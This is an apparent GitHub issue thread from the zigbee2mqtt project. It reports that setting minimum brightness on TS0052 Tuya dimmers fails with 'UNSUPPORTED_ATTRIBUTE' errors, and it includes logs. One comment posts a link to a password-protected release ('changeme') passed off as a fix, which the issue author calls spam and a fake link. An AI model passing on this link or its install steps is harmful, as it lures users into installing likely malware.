Koenkk/zigbee2mqtt #23769: TS0052 (_TZ3000_zjtxnoft and _TZ3000_ooc8illt) cannot set minimum brightness

andreagdipaolo, 2024-08-29:
### What happened?

It is impossible to set minimum brightness on these two devices.
They are a 2 and 1 channel dimmers.
Wenever I try to set it, I get an error like this:
`z2m: Publish 'set' 'min_brightness' to '0xa4c1385a5fbec5f8' failed: 'Error: ZCL command 0xa4c1385a5fbec5f8/1 genLevelCtrl.write({"64512":{"value":32511,"type":33}}, {"timeout":10000,"disableResponse":false,"disableRecovery":false,"disableDefaultResponse":true,"direction":0,"reservedBits":0,"writeUndiv":false}) failed (Status 'UNSUPPORTED_ATTRIBUTE')'`

P.S. i noticed that in the device page on the website this feature is listed but not described.

### How to reproduce it (minimal and precise)

Try setting a minimum brightness from the "exposes" tab

### Zigbee2MQTT version

1.39.1-dev commit: 6ed9b26

### Adapter firmware version

7.4.3 [GA]

### Adapter

SONOFF Zigbee 3.0 USB Dongle Plus V2

### Setup

Docker container on DietPi, Radxa Rock 4

Amrithesh-k, 2024-08-29:
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

andreagdipaolo, 2024-08-29:
> to fix your trouble check this fix, i see it in another issue, https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix password: changeme when you installing, you need to place a check in install to path and select "gcc."

Why are you spamming? That's a fake link too.

Amrithesh-k, 2024-08-29:
I got hacked plz someone help

kajapa, 2024-11-23:
Hey!
I also have the same issue while trying to set Minimum Brightness in my both 1 Gang dimmers.

Error message:
```
[2024-11-23 16:03:40] error: 	z2m: Publish 'set' 'min_brightness' to 'Patryk - kinkiet' failed: 'Error: ZCL command 0xa4c138173ab8f9a6/1 genLevelCtrl.write({"64512":{"value":41215,"type":33}}, {"timeout":10000,"disableResponse":false,"disableRecovery":false,"disableDefaultResponse":true,"direction":0,"reservedBits":0,"writeUndiv":false}) failed (Status 'UNSUPPORTED_ATTRIBUTE')'

[2024-11-23 16:03:40] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/bridge/log', payload '{"message":"Publish 'set' 'min_brightness' to 'Patryk - kinkiet' failed: 'Error: ZCL command 0xa4c138173ab8f9a6/1 genLevelCtrl.write({\"64512\":{\"value\":41215,\"type\":33}}, {\"timeout\":10000,\"disableResponse\":false,\"disableRecovery\":false,\"disableDefaultResponse\":true,\"direction\":0,\"reservedBits\":0,\"writeUndiv\":false}) failed (Status 'UNSUPPORTED_ATTRIBUTE')'","meta":{"friendly_name":"Patryk - kinkiet"},"type":"zigbee_publish_error"}'

[2024-11-23 16:03:53] error: 	z2m: Publish 'set' 'min_brightness' to 'Patryk - kinkiet' failed: 'Error: ZCL command 0xa4c138173ab8f9a6/1 genLevelCtrl.write({"64512":{"value":26623,"type":33}}, {"timeout":10000,"disableResponse":false,"disableRecovery":false,"disableDefaultResponse":true,"direction":0,"reservedBits":0,"writeUndiv":false}) failed (Status 'UNSUPPORTED_ATTRIBUTE')'

[2024-11-23 16:03:53] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/bridge/log', payload '{"message":"Publish 'set' 'min_brightness' to 'Patryk - kinkiet' failed: 'Error: ZCL command 0xa4c138173ab8f9a6/1 genLevelCtrl.write({\"64512\":{\"value\":26623,\"type\":33}}, {\"timeout\":10000,\"disableResponse\":false,\"disableRecovery\":false,\"disableDefaultResponse\":true,\"direction\":0,\"reservedBits\":0,\"writeUndiv\":false}) failed (Status 'UNSUPPORTED_ATTRIBUTE')'","meta":{"friendly_name":"Patryk - kinkiet"},"type":"zigbee_publish_error"}'
```
[image]

[image]

benkrejci, 2025-01-23:
same problem 😢

closed 2025-04-01 by github-actions[bot]

andreagdipaolo, 2025-04-01:
Could anyone look into this? Please